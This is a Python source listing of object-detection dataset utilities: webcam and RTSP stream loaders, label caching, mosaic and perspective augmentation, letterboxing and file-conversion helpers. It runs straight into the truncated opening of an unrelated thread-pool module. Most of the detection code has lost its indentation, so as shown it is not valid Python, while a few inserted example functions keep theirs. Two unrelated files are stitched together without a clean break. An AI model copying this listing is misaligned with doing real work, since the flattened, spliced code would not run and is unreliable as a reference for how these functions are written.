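# Illustrative usage sketch: LoadImages yields one frame at a time, already letterboxed and
# converted to CHW RGB, ready for a forward pass. The source path below is an example, not
# something this module requires to exist.
def _load_images_example(source='inference/images', img_size=640):
    import torch
    dataset = LoadImages(source, img_size=img_size)
    for path, img, im0, vid_cap in dataset:
        img = torch.from_numpy(img).float() / 255.0  # uint8 0-255 -> float 0.0-1.0
        if img.ndimension() == 3:
            img = img.unsqueeze(0)  # add a batch dimension: (1, 3, h, w)
        print(path, tuple(img.shape), im0.shape)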
class LoadWebcam: # for inference
def __init__(self, pipe=0, img_size=640):
self.img_size = img_size
if pipe == '0':
pipe = 0 # local camera
# pipe = 'rtsp://192.168.1.64/1' # IP camera
# pipe = 'rtsp://username:password@192.168.1.64/1' # IP camera with login
# pipe = 'rtsp://170.93.143.139/rtplive/470011e600ef003a004ee33696235daa' # IP traffic camera
# pipe = 'http://wmccpinetop.axiscam.net/mjpg/video.mjpg' # IP golf camera
# https://answers.opencv.org/question/215996/changing-gstreamer-pipeline-to-opencv-in-pythonsolved/
# pipe = '"rtspsrc location="rtsp://username:password@192.168.1.64/1" latency=10 ! appsink' # GStreamer
# https://answers.opencv.org/question/200787/video-acceleration-gstremer-pipeline-in-videocapture/
# https://stackoverflow.com/questions/54095699/install-gstreamer-support-for-opencv-python-package # install help
# pipe = "rtspsrc location=rtsp://root:root@192.168.0.91:554/axis-media/media.amp?videocodec=h264&resolution=3840x2160 protocols=GST_RTSP_LOWER_TRANS_TCP ! rtph264depay ! queue ! vaapih264dec ! videoconvert ! appsink" # GStreamer
self.pipe = pipe
self.cap = cv2.VideoCapture(pipe) # video capture object
self.cap.set(cv2.CAP_PROP_BUFFERSIZE, 3) # set buffer size
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
if cv2.waitKey(1) == ord('q'): # q to quit
self.cap.release()
cv2.destroyAllWindows()
raise StopIteration
# Read frame
if self.pipe == 0: # local camera
ret_val, img0 = self.cap.read()
img0 = cv2.flip(img0, 1) # flip left-right
else: # IP camera
n = 0
while True:
n += 1
self.cap.grab()
if n % 30 == 0: # skip frames
ret_val, img0 = self.cap.retrieve()
if ret_val:
break
# Print
assert ret_val, 'Camera Error %s' % self.pipe
img_path = 'webcam.jpg'
print('webcam %g: ' % self.count, end='')
# Padded resize
img = letterbox(img0, new_shape=self.img_size)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return img_path, img, img0, None
def __len__(self):
return 0
class LoadStreams: # multiple IP or RTSP cameras
def __init__(self, sources='streams.txt', img_size=640):
self.mode = 'images'
self.img_size = img_size
if os.path.isfile(sources):
with open(sources, 'r') as f:
sources = [x.strip() for x in f.read().splitlines() if len(x.strip())]
else:
sources = [sources]
n = len(sources)
self.imgs = [None] * n
self.sources = sources
for i, s in enumerate(sources):
# Start the thread to read frames from the video stream
print('%g/%g: %s... ' % (i + 1, n, s), end='')
            cap = cv2.VideoCapture(int(s) if s.isnumeric() else s)  # webcam index or stream URL
assert cap.isOpened(), 'Failed to open %s' % s
w = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
h = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps = cap.get(cv2.CAP_PROP_FPS) % 100
_, self.imgs[i] = cap.read() # guarantee first frame
thread = Thread(target=self.update, args=([i, cap]), daemon=True)
print(' success (%gx%g at %.2f FPS).' % (w, h, fps))
thread.start()
print('') # newline
# check for common shapes
s = np.stack([letterbox(x, new_shape=self.img_size)[0].shape for x in self.imgs], 0) # inference shapes
self.rect = np.unique(s, axis=0).shape[0] == 1 # rect inference if all shapes equal
if not self.rect:
print('WARNING: Different stream shapes detected. For optimal performance supply similarly-shaped streams.')
def update(self, index, cap):
# Read next stream frame in a daemon thread
n = 0
while cap.isOpened():
n += 1
# _, self.imgs[index] = cap.read()
cap.grab()
if n == 4: # read every 4th frame
_, self.imgs[index] = cap.retrieve()
n = 0
time.sleep(0.01) # wait time
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
img0 = self.imgs.copy()
if cv2.waitKey(1) == ord('q'): # q to quit
cv2.destroyAllWindows()
raise StopIteration
# Letterbox
img = [letterbox(x, new_shape=self.img_size, auto=self.rect)[0] for x in img0]
# Stack
img = np.stack(img, 0)
# Convert
img = img[:, :, :, ::-1].transpose(0, 3, 1, 2) # BGR to RGB, to bsx3x416x416
img = np.ascontiguousarray(img)
return self.sources, img, img0, None
def __len__(self):
return 0 # 1E12 frames = 32 streams at 30 FPS for 30 years
class LoadImagesAndLabels(Dataset): # for training/testing
def __init__(self, path, img_size=640, batch_size=16, augment=False, hyp=None, rect=False, image_weights=False,
cache_images=False, single_cls=False, stride=32, pad=0.0, rank=-1):
try:
f = [] # image files
for p in path if isinstance(path, list) else [path]:
p = str(Path(p)) # os-agnostic
parent = str(Path(p).parent) + os.sep
if os.path.isfile(p): # file
with open(p, 'r') as t:
t = t.read().splitlines()
f += [x.replace('./', parent) if x.startswith('./') else x for x in t] # local to global path
elif os.path.isdir(p): # folder
f += glob.iglob(p + os.sep + '*.*')
else:
raise Exception('%s does not exist' % p)
self.img_files = sorted(
[x.replace('/', os.sep) for x in f if os.path.splitext(x)[-1].lower() in img_formats])
except Exception as e:
raise Exception('Error loading data from %s: %s\nSee %s' % (path, e, help_url))
n = len(self.img_files)
assert n > 0, 'No images found in %s. See %s' % (path, help_url)
        bi = np.floor(np.arange(n) / batch_size).astype(int)  # batch index
nb = bi[-1] + 1 # number of batches
self.n = n # number of images
self.batch = bi # batch index of image
self.img_size = img_size
self.augment = augment
self.hyp = hyp
self.image_weights = image_weights
self.rect = False if image_weights else rect
self.mosaic = self.augment and not self.rect # load 4 images at a time into a mosaic (only during training)
self.mosaic_border = [-img_size // 2, -img_size // 2]
self.stride = stride
# Define labels
self.label_files = [x.replace('images', 'labels').replace(os.path.splitext(x)[-1], '.txt') for x in
self.img_files]
# Check cache
cache_path = str(Path(self.label_files[0]).parent) + '.cache' # cached labels
if os.path.isfile(cache_path):
cache = torch.load(cache_path) # load
if cache['hash'] != get_hash(self.label_files + self.img_files): # dataset changed
cache = self.cache_labels(cache_path) # re-cache
else:
cache = self.cache_labels(cache_path) # cache
# Get labels
labels, shapes = zip(*[cache[x] for x in self.img_files])
self.shapes = np.array(shapes, dtype=np.float64)
self.labels = list(labels)
# Rectangular Training https://github.com/ultralytics/yolov3/issues/232
if self.rect:
# Sort by aspect ratio
s = self.shapes # wh
ar = s[:, 1] / s[:, 0] # aspect ratio
irect = ar.argsort()
self.img_files = [self.img_files[i] for i in irect]
self.label_files = [self.label_files[i] for i in irect]
self.labels = [self.labels[i] for i in irect]
self.shapes = s[irect] # wh
ar = ar[irect]
# Set training image shapes
shapes = [[1, 1]] * nb
for i in range(nb):
ari = ar[bi == i]
mini, maxi = ari.min(), ari.max()
if maxi < 1:
shapes[i] = [maxi, 1]
elif mini > 1:
shapes[i] = [1, 1 / mini]
            self.batch_shapes = np.ceil(np.array(shapes) * img_size / stride + pad).astype(int) * stride
# Cache labels
create_datasubset, extract_bounding_boxes, labels_loaded = False, False, False
nm, nf, ne, ns, nd = 0, 0, 0, 0, 0 # number missing, found, empty, datasubset, duplicate
pbar = enumerate(self.label_files)
if rank in [-1, 0]:
pbar = tqdm(pbar)
for i, file in pbar:
l = self.labels[i] # label
if l is not None and l.shape[0]:
                assert l.shape[1] == 5, 'labels require 5 columns each: %s' % file
assert (l >= 0).all(), 'negative labels: %s' % file
assert (l[:, 1:] <= 1).all(), 'non-normalized or out of bounds coordinate labels: %s' % file
if np.unique(l, axis=0).shape[0] < l.shape[0]: # duplicate rows
nd += 1 # print('WARNING: duplicate rows in %s' % self.label_files[i]) # duplicate rows
if single_cls:
l[:, 0] = 0 # force dataset into single-class mode
self.labels[i] = l
nf += 1 # file found
# Create subdataset (a smaller dataset)
if create_datasubset and ns < 1E4:
if ns == 0:
create_folder(path='./datasubset')
os.makedirs('./datasubset/images')
exclude_classes = 43
if exclude_classes not in l[:, 0]:
ns += 1
# shutil.copy(src=self.img_files[i], dst='./datasubset/images/') # copy image
with open('./datasubset/images.txt', 'a') as f:
f.write(self.img_files[i] + '\n')
# Extract object detection boxes for a second stage classifier
if extract_bounding_boxes:
p = Path(self.img_files[i])
img = cv2.imread(str(p))
h, w = img.shape[:2]
for j, x in enumerate(l):
f = '%s%sclassifier%s%g_%g_%s' % (p.parent.parent, os.sep, os.sep, x[0], j, p.name)
if not os.path.exists(Path(f).parent):
os.makedirs(Path(f).parent) # make new output folder
b = x[1:] * [w, h, w, h] # box
b[2:] = b[2:].max() # rectangle to square
b[2:] = b[2:] * 1.3 + 30 # pad
                        b = xywh2xyxy(b.reshape(-1, 4)).ravel().astype(int)
b[[0, 2]] = np.clip(b[[0, 2]], 0, w) # clip boxes outside of image
b[[1, 3]] = np.clip(b[[1, 3]], 0, h)
assert cv2.imwrite(f, img[b[1]:b[3], b[0]:b[2]]), 'Failure extracting classifier boxes'
else:
ne += 1 # print('empty labels for image %s' % self.img_files[i]) # file empty
# os.system("rm '%s' '%s'" % (self.img_files[i], self.label_files[i])) # remove
if rank in [-1, 0]:
pbar.desc = 'Scanning labels %s (%g found, %g missing, %g empty, %g duplicate, for %g images)' % (
cache_path, nf, nm, ne, nd, n)
if nf == 0:
s = 'WARNING: No labels found in %s. See %s' % (os.path.dirname(file) + os.sep, help_url)
print(s)
            assert not augment, '%s. Cannot train without labels.' % s
# Cache images into memory for faster training (WARNING: large datasets may exceed system RAM)
self.imgs = [None] * n
if cache_images:
gb = 0 # Gigabytes of cached images
pbar = tqdm(range(len(self.img_files)), desc='Caching images')
self.img_hw0, self.img_hw = [None] * n, [None] * n
            for i in pbar:  # cache every image into RAM
self.imgs[i], self.img_hw0[i], self.img_hw[i] = load_image(self, i) # img, hw_original, hw_resized
gb += self.imgs[i].nbytes
pbar.desc = 'Caching images (%.1fGB)' % (gb / 1E9)
def cache_labels(self, path='labels.cache'):
# Cache dataset labels, check images and read shapes
x = {} # dict
pbar = tqdm(zip(self.img_files, self.label_files), desc='Scanning images', total=len(self.img_files))
for (img, label) in pbar:
try:
l = []
image = Image.open(img)
image.verify() # PIL verify
# _ = io.imread(img) # skimage verify (from skimage import io)
shape = exif_size(image) # image size
assert (shape[0] > 9) & (shape[1] > 9), 'image size <10 pixels'
if os.path.isfile(label):
with open(label, 'r') as f:
l = np.array([x.split() for x in f.read().splitlines()], dtype=np.float32) # labels
if len(l) == 0:
l = np.zeros((0, 5), dtype=np.float32)
x[img] = [l, shape]
except Exception as e:
x[img] = [None, None]
print('WARNING: %s: %s' % (img, e))
x['hash'] = get_hash(self.label_files + self.img_files)
torch.save(x, path) # save for next time
return x
def __len__(self):
return len(self.img_files)
# def __iter__(self):
# self.count = -1
# print('ran dataset iter')
# #self.shuffled_vector = np.random.permutation(self.nF) if self.augment else np.arange(self.nF)
# return self
def __getitem__(self, index):
if self.image_weights:
index = self.indices[index]
hyp = self.hyp
if self.mosaic:
# Load mosaic
img, labels = load_mosaic(self, index)
shapes = None
# MixUp https://arxiv.org/pdf/1710.09412.pdf
if random.random() < hyp['mixup']:
img2, labels2 = load_mosaic(self, random.randint(0, len(self.labels) - 1))
r = np.random.beta(8.0, 8.0) # mixup ratio, alpha=beta=8.0
img = (img * r + img2 * (1 - r)).astype(np.uint8)
labels = np.concatenate((labels, labels2), 0)
else:
# Load image
img, (h0, w0), (h, w) = load_image(self, index)
# Letterbox
shape = self.batch_shapes[self.batch[index]] if self.rect else self.img_size # final letterboxed shape
img, ratio, pad = letterbox(img, shape, auto=False, scaleup=self.augment)
shapes = (h0, w0), ((h / h0, w / w0), pad) # for COCO mAP rescaling
# Load labels
labels = []
x = self.labels[index]
if x.size > 0:
# Normalized xywh to pixel xyxy format
labels = x.copy()
labels[:, 1] = ratio[0] * w * (x[:, 1] - x[:, 3] / 2) + pad[0] # pad width
labels[:, 2] = ratio[1] * h * (x[:, 2] - x[:, 4] / 2) + pad[1] # pad height
labels[:, 3] = ratio[0] * w * (x[:, 1] + x[:, 3] / 2) + pad[0]
labels[:, 4] = ratio[1] * h * (x[:, 2] + x[:, 4] / 2) + pad[1]
if self.augment:
# Augment imagespace
if not self.mosaic:
img, labels = random_perspective(img, labels,
degrees=hyp['degrees'],
translate=hyp['translate'],
scale=hyp['scale'],
shear=hyp['shear'],
perspective=hyp['perspective'])
# Augment colorspace
augment_hsv(img, hgain=hyp['hsv_h'], sgain=hyp['hsv_s'], vgain=hyp['hsv_v'])
# Apply cutouts
# if random.random() < 0.9:
# labels = cutout(img, labels)
nL = len(labels) # number of labels
if nL:
labels[:, 1:5] = xyxy2xywh(labels[:, 1:5]) # convert xyxy to xywh
labels[:, [2, 4]] /= img.shape[0] # normalized height 0-1
labels[:, [1, 3]] /= img.shape[1] # normalized width 0-1
if self.augment:
# flip up-down
if random.random() < hyp['flipud']:
img = np.flipud(img)
if nL:
labels[:, 2] = 1 - labels[:, 2]
# flip left-right
if random.random() < hyp['fliplr']:
img = np.fliplr(img)
if nL:
labels[:, 1] = 1 - labels[:, 1]
labels_out = torch.zeros((nL, 6))
if nL:
labels_out[:, 1:] = torch.from_numpy(labels)
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return torch.from_numpy(img), labels_out, self.img_files[index], shapes
@staticmethod
def collate_fn(batch):
img, label, path, shapes = zip(*batch) # transposed
for i, l in enumerate(label):
l[:, 0] = i # add target image index for build_targets()
return torch.stack(img, 0), torch.cat(label, 0), path, shapes
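# Illustrative sketch of the batch format produced by collate_fn: images are stacked into a
# (bs, 3, h, w) tensor and labels are concatenated into an (n, 6) tensor whose first column
# is the index of the image within the batch, which is what build_targets() keys on.
def _collate_fn_example():
    import torch
    imgs = [torch.zeros(3, 64, 64), torch.zeros(3, 64, 64)]
    labels = [torch.zeros(1, 6), torch.zeros(2, 6)]  # rows: [img_idx, cls, x, y, w, h]
    batch = list(zip(imgs, labels, ['a.jpg', 'b.jpg'], [None, None]))
    imgs_t, labels_t, paths, shapes = LoadImagesAndLabels.collate_fn(batch)
    print(imgs_t.shape, labels_t.shape, labels_t[:, 0].tolist())  # (2, 3, 64, 64), (3, 6), [0.0, 1.0, 1.0]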
# Ancillary functions --------------------------------------------------------------------------------------------------
def load_image(self, index):
# loads 1 image from dataset, returns img, original hw, resized hw
img = self.imgs[index]
if img is None: # not cached
path = self.img_files[index]
img = cv2.imread(path) # BGR
assert img is not None, 'Image Not Found ' + path
h0, w0 = img.shape[:2] # orig hw
r = self.img_size / max(h0, w0) # resize image to img_size
if r != 1: # always resize down, only resize up if training with augmentation
interp = cv2.INTER_AREA if r < 1 and not self.augment else cv2.INTER_LINEAR
img = cv2.resize(img, (int(w0 * r), int(h0 * r)), interpolation=interp)
return img, (h0, w0), img.shape[:2] # img, hw_original, hw_resized
else:
return self.imgs[index], self.img_hw0[index], self.img_hw[index] # img, hw_original, hw_resized
def augment_hsv(img, hgain=0.5, sgain=0.5, vgain=0.5):
r = np.random.uniform(-1, 1, 3) * [hgain, sgain, vgain] + 1 # random gains
hue, sat, val = cv2.split(cv2.cvtColor(img, cv2.COLOR_BGR2HSV))
dtype = img.dtype # uint8
x = np.arange(0, 256, dtype=np.int16)
lut_hue = ((x * r[0]) % 180).astype(dtype)
lut_sat = np.clip(x * r[1], 0, 255).astype(dtype)
lut_val = np.clip(x * r[2], 0, 255).astype(dtype)
img_hsv = cv2.merge((cv2.LUT(hue, lut_hue), cv2.LUT(sat, lut_sat), cv2.LUT(val, lut_val))).astype(dtype)
cv2.cvtColor(img_hsv, cv2.COLOR_HSV2BGR, dst=img) # no return needed
# Histogram equalization
# if random.random() < 0.2:
# for i in range(3):
# img[:, :, i] = cv2.equalizeHist(img[:, :, i])
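# Illustrative sketch: augment_hsv modifies the image in place via three cv2.LUT lookups,
# so the random gains cost three table lookups instead of per-pixel float math. With only
# a value gain, the hue and saturation of this flat gray patch are untouched.
def _augment_hsv_example():
    import numpy as np
    img = np.full((4, 4, 3), 128, dtype=np.uint8)  # flat gray patch
    augment_hsv(img, hgain=0.0, sgain=0.0, vgain=0.5)  # jitter brightness only, in place
    print(int(img.min()), int(img.max()))  # one uniform value, roughly in 64..192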
def load_mosaic(self, index):
# loads images in a mosaic
labels4 = []
s = self.img_size
yc, xc = [int(random.uniform(-x, 2 * s + x)) for x in self.mosaic_border] # mosaic center x, y
indices = [index] + [random.randint(0, len(self.labels) - 1) for _ in range(3)] # 3 additional image indices
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = load_image(self, index)
# place img in img4
if i == 0: # top left
img4 = np.full((s * 2, s * 2, img.shape[2]), 114, dtype=np.uint8) # base image with 4 tiles
x1a, y1a, x2a, y2a = max(xc - w, 0), max(yc - h, 0), xc, yc # xmin, ymin, xmax, ymax (large image)
x1b, y1b, x2b, y2b = w - (x2a - x1a), h - (y2a - y1a), w, h # xmin, ymin, xmax, ymax (small image)
elif i == 1: # top right
x1a, y1a, x2a, y2a = xc, max(yc - h, 0), min(xc + w, s * 2), yc
x1b, y1b, x2b, y2b = 0, h - (y2a - y1a), min(w, x2a - x1a), h
elif i == 2: # bottom left
x1a, y1a, x2a, y2a = max(xc - w, 0), yc, xc, min(s * 2, yc + h)
x1b, y1b, x2b, y2b = w - (x2a - x1a), 0, max(xc, w), min(y2a - y1a, h)
elif i == 3: # bottom right
x1a, y1a, x2a, y2a = xc, yc, min(xc + w, s * 2), min(s * 2, yc + h)
x1b, y1b, x2b, y2b = 0, 0, min(w, x2a - x1a), min(y2a - y1a, h)
img4[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
padw = x1a - x1b
padh = y1a - y1b
# Labels
x = self.labels[index]
labels = x.copy()
if x.size > 0: # Normalized xywh to pixel xyxy format
labels[:, 1] = w * (x[:, 1] - x[:, 3] / 2) + padw
labels[:, 2] = h * (x[:, 2] - x[:, 4] / 2) + padh
labels[:, 3] = w * (x[:, 1] + x[:, 3] / 2) + padw
labels[:, 4] = h * (x[:, 2] + x[:, 4] / 2) + padh
labels4.append(labels)
# Concat/clip labels
if len(labels4):
labels4 = np.concatenate(labels4, 0)
np.clip(labels4[:, 1:], 0, 2 * s, out=labels4[:, 1:]) # use with random_perspective
# img4, labels4 = replicate(img4, labels4) # replicate
# Augment
img4, labels4 = random_perspective(img4, labels4,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
perspective=self.hyp['perspective'],
border=self.mosaic_border) # border to remove
return img4, labels4
def replicate(img, labels):
# Replicate labels
h, w = img.shape[:2]
boxes = labels[:, 1:].astype(int)
x1, y1, x2, y2 = boxes.T
s = ((x2 - x1) + (y2 - y1)) / 2 # side length (pixels)
for i in s.argsort()[:round(s.size * 0.5)]: # smallest indices
x1b, y1b, x2b, y2b = boxes[i]
bh, bw = y2b - y1b, x2b - x1b
yc, xc = int(random.uniform(0, h - bh)), int(random.uniform(0, w - bw)) # offset x, y
x1a, y1a, x2a, y2a = [xc, yc, xc + bw, yc + bh]
img[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
labels = np.append(labels, [[labels[i, 0], x1a, y1a, x2a, y2a]], axis=0)
return img, labels
def letterbox(img, new_shape=(640, 640), color=(114, 114, 114), auto=True, scaleFill=False, scaleup=True):
# Resize image to a 32-pixel-multiple rectangle https://github.com/ultralytics/yolov3/issues/232
shape = img.shape[:2] # current shape [height, width]
if isinstance(new_shape, int):
new_shape = (new_shape, new_shape)
# Scale ratio (new / old)
r = min(new_shape[0] / shape[0], new_shape[1] / shape[1])
if not scaleup: # only scale down, do not scale up (for better test mAP)
r = min(r, 1.0)
# Compute padding
ratio = r, r # width, height ratios
new_unpad = int(round(shape[1] * r)), int(round(shape[0] * r))
dw, dh = new_shape[1] - new_unpad[0], new_shape[0] - new_unpad[1] # wh padding
if auto: # minimum rectangle
dw, dh = np.mod(dw, 64), np.mod(dh, 64) # wh padding
elif scaleFill: # stretch
dw, dh = 0.0, 0.0
new_unpad = (new_shape[1], new_shape[0])
ratio = new_shape[1] / shape[1], new_shape[0] / shape[0] # width, height ratios
dw /= 2 # divide padding into 2 sides
dh /= 2
if shape[::-1] != new_unpad: # resize
img = cv2.resize(img, new_unpad, interpolation=cv2.INTER_LINEAR)
top, bottom = int(round(dh - 0.1)), int(round(dh + 0.1))
left, right = int(round(dw - 0.1)), int(round(dw + 0.1))
img = cv2.copyMakeBorder(img, top, bottom, left, right, cv2.BORDER_CONSTANT, value=color) # add border
return img, ratio, (dw, dh)
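# Worked example (sketch): letterboxing a 720x1280 (h x w) frame to 640 with auto=True.
# r = min(640/720, 640/1280) = 0.5, so the frame becomes 360x640; the leftover height (280)
# is reduced modulo 64 to 24 and split into 12 px of gray (114) padding on the top and
# bottom, giving a 384x640 result.
def _letterbox_example():
    import numpy as np
    frame = np.zeros((720, 1280, 3), dtype=np.uint8)
    img, ratio, (dw, dh) = letterbox(frame, new_shape=640)
    print(img.shape, ratio, (dw, dh))  # (384, 640, 3) (0.5, 0.5) (0.0, 12.0)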
def random_perspective(img, targets=(), degrees=10, translate=.1, scale=.1, shear=10, perspective=0.0, border=(0, 0)):
# torchvision.transforms.RandomAffine(degrees=(-10, 10), translate=(.1, .1), scale=(.9, 1.1), shear=(-10, 10))
# targets = [cls, xyxy]
height = img.shape[0] + border[0] * 2 # shape(h,w,c)
width = img.shape[1] + border[1] * 2
# Center
C = np.eye(3)
C[0, 2] = -img.shape[1] / 2 # x translation (pixels)
C[1, 2] = -img.shape[0] / 2 # y translation (pixels)
# Perspective
P = np.eye(3)
P[2, 0] = random.uniform(-perspective, perspective) # x perspective (about y)
P[2, 1] = random.uniform(-perspective, perspective) # y perspective (about x)
# Rotation and Scale
R = np.eye(3)
a = random.uniform(-degrees, degrees)
# a += random.choice([-180, -90, 0, 90]) # add 90deg rotations to small rotations
s = random.uniform(1 - scale, 1 + scale)
# s = 2 ** random.uniform(-scale, scale)
R[:2] = cv2.getRotationMatrix2D(angle=a, center=(0, 0), scale=s)
# Shear
S = np.eye(3)
S[0, 1] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # x shear (deg)
S[1, 0] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # y shear (deg)
# Translation
T = np.eye(3)
T[0, 2] = random.uniform(0.5 - translate, 0.5 + translate) * width # x translation (pixels)
T[1, 2] = random.uniform(0.5 - translate, 0.5 + translate) * height # y translation (pixels)
# Combined rotation matrix
M = T @ S @ R @ P @ C # order of operations (right to left) is IMPORTANT
if (border[0] != 0) or (border[1] != 0) or (M != np.eye(3)).any(): # image changed
if perspective:
img = cv2.warpPerspective(img, M, dsize=(width, height), borderValue=(114, 114, 114))
else: # affine
img = cv2.warpAffine(img, M[:2], dsize=(width, height), borderValue=(114, 114, 114))
# Visualize
# import matplotlib.pyplot as plt
# ax = plt.subplots(1, 2, figsize=(12, 6))[1].ravel()
# ax[0].imshow(img[:, :, ::-1]) # base
# ax[1].imshow(img2[:, :, ::-1]) # warped
# Transform label coordinates
n = len(targets)
if n:
# warp points
xy = np.ones((n * 4, 3))
xy[:, :2] = targets[:, [1, 2, 3, 4, 1, 4, 3, 2]].reshape(n * 4, 2) # x1y1, x2y2, x1y2, x2y1
xy = xy @ M.T # transform
if perspective:
xy = (xy[:, :2] / xy[:, 2:3]).reshape(n, 8) # rescale
else: # affine
xy = xy[:, :2].reshape(n, 8)
# create new boxes
x = xy[:, [0, 2, 4, 6]]
y = xy[:, [1, 3, 5, 7]]
xy = np.concatenate((x.min(1), y.min(1), x.max(1), y.max(1))).reshape(4, n).T
# # apply angle-based reduction of bounding boxes
# radians = a * math.pi / 180
# reduction = max(abs(math.sin(radians)), abs(math.cos(radians))) ** 0.5
# x = (xy[:, 2] + xy[:, 0]) / 2
# y = (xy[:, 3] + xy[:, 1]) / 2
# w = (xy[:, 2] - xy[:, 0]) * reduction
# h = (xy[:, 3] - xy[:, 1]) * reduction
# xy = np.concatenate((x - w / 2, y - h / 2, x + w / 2, y + h / 2)).reshape(4, n).T
# clip boxes
xy[:, [0, 2]] = xy[:, [0, 2]].clip(0, width)
xy[:, [1, 3]] = xy[:, [1, 3]].clip(0, height)
# filter candidates
i = box_candidates(box1=targets[:, 1:5].T * s, box2=xy.T)
targets = targets[i]
targets[:, 1:5] = xy[i]
return img, targets
def box_candidates(box1, box2, wh_thr=2, ar_thr=20, area_thr=0.1): # box1(4,n), box2(4,n)
# Compute candidate boxes: box1 before augment, box2 after augment, wh_thr (pixels), aspect_ratio_thr, area_ratio
w1, h1 = box1[2] - box1[0], box1[3] - box1[1]
w2, h2 = box2[2] - box2[0], box2[3] - box2[1]
ar = np.maximum(w2 / (h2 + 1e-16), h2 / (w2 + 1e-16)) # aspect ratio
return (w2 > wh_thr) & (h2 > wh_thr) & (w2 * h2 / (w1 * h1 + 1e-16) > area_thr) & (ar < ar_thr) # candidates
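# Worked example (sketch): a 100x50 box squashed to a 40x1 sliver by augmentation is
# rejected -- its 1 px height fails wh_thr, its new aspect ratio (40) exceeds ar_thr=20,
# and its area ratio (40 / 5000) falls below area_thr=0.1. Boxes are column-wise (4, n).
def _box_candidates_example():
    import numpy as np
    box1 = np.array([[0.], [0.], [100.], [50.]])  # before augment: one 100x50 box
    box2 = np.array([[0.], [0.], [40.], [1.]])    # after augment: a 40x1 sliver
    print(box_candidates(box1, box2))  # [False]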
def cutout(image, labels):
# Applies image cutout augmentation https://arxiv.org/abs/1708.04552
h, w = image.shape[:2]
def bbox_ioa(box1, box2):
# Returns the intersection over box2 area given box1, box2. box1 is 4, box2 is nx4. boxes are x1y1x2y2
box2 = box2.transpose()
# Get the coordinates of bounding boxes
b1_x1, b1_y1, b1_x2, b1_y2 = box1[0], box1[1], box1[2], box1[3]
b2_x1, b2_y1, b2_x2, b2_y2 = box2[0], box2[1], box2[2], box2[3]
# Intersection area
inter_area = (np.minimum(b1_x2, b2_x2) - np.maximum(b1_x1, b2_x1)).clip(0) * \
(np.minimum(b1_y2, b2_y2) - np.maximum(b1_y1, b2_y1)).clip(0)
# box2 area
box2_area = (b2_x2 - b2_x1) * (b2_y2 - b2_y1) + 1e-16
# Intersection over box2 area
return inter_area / box2_area
# create random masks
scales = [0.5] * 1 + [0.25] * 2 + [0.125] * 4 + [0.0625] * 8 + [0.03125] * 16 # image size fraction
for s in scales:
mask_h = random.randint(1, int(h * s))
mask_w = random.randint(1, int(w * s))
# box
xmin = max(0, random.randint(0, w) - mask_w // 2)
ymin = max(0, random.randint(0, h) - mask_h // 2)
xmax = min(w, xmin + mask_w)
ymax = min(h, ymin + mask_h)
# apply random color mask
image[ymin:ymax, xmin:xmax] = [random.randint(64, 191) for _ in range(3)]
# return unobscured labels
if len(labels) and s > 0.03:
box = np.array([xmin, ymin, xmax, ymax], dtype=np.float32)
ioa = bbox_ioa(box, labels[:, 1:5]) # intersection over area
labels = labels[ioa < 0.60] # remove >60% obscured labels
return labels
def reduce_img_size(path='path/images', img_size=1024): # from utils.datasets import *; reduce_img_size()
# creates a new ./images_reduced folder with reduced size images of maximum size img_size
path_new = path + '_reduced' # reduced images path
create_folder(path_new)
for f in tqdm(glob.glob('%s/*.*' % path)):
try:
img = cv2.imread(f)
h, w = img.shape[:2]
r = img_size / max(h, w) # size ratio
if r < 1.0:
img = cv2.resize(img, (int(w * r), int(h * r)), interpolation=cv2.INTER_AREA) # _LINEAR fastest
fnew = f.replace(path, path_new) # .replace(Path(f).suffix, '.jpg')
cv2.imwrite(fnew, img)
        except Exception:
            print('WARNING: image failure %s' % f)
def recursive_dataset2bmp(dataset='path/dataset_bmp'): # from utils.datasets import *; recursive_dataset2bmp()
# Converts dataset to bmp (for faster training)
formats = [x.lower() for x in img_formats] + [x.upper() for x in img_formats]
for a, b, files in os.walk(dataset):
for file in tqdm(files, desc=a):
p = a + '/' + file
s = Path(file).suffix
if s == '.txt': # replace text
with open(p, 'r') as f:
lines = f.read()
for f in formats:
lines = lines.replace(f, '.bmp')
with open(p, 'w') as f:
f.write(lines)
elif s in formats: # replace image
cv2.imwrite(p.replace(s, '.bmp'), cv2.imread(p))
if s != '.bmp':
os.system("rm '%s'" % p)
def imagelist2folder(path='path/images.txt'): # from utils.datasets import *; imagelist2folder()
# Copies all the images in a text file (list of images) into a folder
create_folder(path[:-4])
with open(path, 'r') as f:
for line in f.read().splitlines():
os.system('cp "%s" %s' % (line, path[:-4]))
print(line)
def create_folder(path='./new'):
# Create folder
if os.path.exists(path):
shutil.rmtree(path) # delete output folder
os.makedirs(path) # make new output folder
|
threadpool.py
|
"""
Generic thread pool class. Modeled after Java's ThreadPoolExecutor.
Please note that this ThreadPool does *not* fully implement the PEP 3148
ThreadPool!
"""
from threading import Thread, Lock, currentThread
from weakref import ref
import logging
from ambari_agent.ExitHelper import ExitHelper
try:
from queue import Queue, Empty
except ImportError:
from Queue import Queue, Empty
logger = logging.getLogger(__name__)
_threadpools = set()
# Worker threads are daemonic in order to let the interpreter exit without
# an explicit shutdown of the thread pool. The following trick is necessary
# to allow worker threads to finish cleanly.
def _shutdown_all():
for pool_ref in tuple(_threadpools):
pool = pool_ref()
if pool:
pool.shutdown()
ExitHelper().register(_shutdown_all)
class ThreadPool(object):
def __init__(self, core_threads=0, max_threads=20, keepalive=1, context_injector=None, agent_config=None):
"""
:param core_threads: maximum number of persistent threads in the pool
:param max_threads: maximum number of total threads in the pool
:param thread_class: callable that creates a Thread object
:param keepalive: seconds to keep non-core worker threads waiting
for new tasks
:type context_injector func
